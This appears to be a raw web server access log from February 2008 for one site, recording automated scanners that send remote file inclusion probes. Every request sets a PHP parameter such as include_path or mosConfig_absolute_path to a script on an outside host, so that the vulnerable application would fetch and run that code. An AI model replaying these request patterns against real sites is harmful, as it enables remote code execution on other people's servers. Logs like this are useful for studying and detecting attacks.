75.127.84.50 - - [10/Feb/2008:05:37:14 -0800] "GET //?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
75.127.84.50 - - [10/Feb/2008:05:37:14 -0800] "GET /logs//?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 200 33976 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.202.173 - - [10/Feb/2008:05:38:55 -0800] "GET //protection.php?action=logout&siteurl=http://oldbonescrew.de/modules/vwar/convert/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
62.75.202.173 - - [10/Feb/2008:05:38:56 -0800] "GET /logs//protection.php?action=logout&siteurl=http://oldbonescrew.de/modules/vwar/convert/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.9.159.213 - - [10/Feb/2008:05:39:32 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [10/Feb/2008:05:39:32 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [10/Feb/2008:05:39:32 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.202.173 - - [10/Feb/2008:05:40:10 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://oldbonescrew.de/modules/vwar/convert/id2.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
81.169.157.58 - - [10/Feb/2008:05:40:20 -0800] "GET /logs/access_080120.log/guestbook/admin.php?include_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.157.58 - - [10/Feb/2008:05:40:20 -0800] "GET /logs/guestbook/admin.php?include_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.202.173 - - [10/Feb/2008:05:40:23 -0800] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://oldbonescrew.de/modules/vwar/convert/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
72.9.159.213 - - [10/Feb/2008:05:41:32 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [10/Feb/2008:05:42:05 -0800] "GET /logs/access_080117.log/skin/zero_vote/view.php?dir=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [10/Feb/2008:05:42:05 -0800] "GET /skin/zero_vote/view.php?dir=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [10/Feb/2008:05:42:05 -0800] "GET /logs/skin/zero_vote/view.php?dir=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.12.20 - - [10/Feb/2008:05:42:28 -0800] "GET /logs/access_071228.log//admin.php?include_path=http://buzz-directory.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [10/Feb/2008:05:42:29 -0800] "GET /logs/access_071228.log//admin.php?include_path=http://buzz-directory.com/safe2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [10/Feb/2008:05:42:30 -0800] "GET //admin.php?include_path=http://buzz-directory.com/safe2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [10/Feb/2008:05:42:30 -0800] "GET /logs//admin.php?include_path=http://buzz-directory.com/safe2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [10/Feb/2008:05:42:33 -0800] "GET //admin.php?include_path=http://buzz-directory.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [10/Feb/2008:05:42:33 -0800] "GET /logs//admin.php?include_path=http://buzz-directory.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.157.58 - - [10/Feb/2008:05:43:14 -0800] "GET /logs/access_080122.log/guestbook/admin.php?include_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:43:35 -0800] "GET /logs/access_080201.log//vbgsitemap/vbgsitemap-config.php?base=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:43:35 -0800] "GET //vbgsitemap/vbgsitemap-config.php?base=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:43:35 -0800] "GET /logs//vbgsitemap/vbgsitemap-config.php?base=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:43:57 -0800] "GET /logs/access_080201.log//vbgsitemap/vbgsitemap-config.php?base=http://sarion.info/m/common/com/id?? HTTP/1.1" 404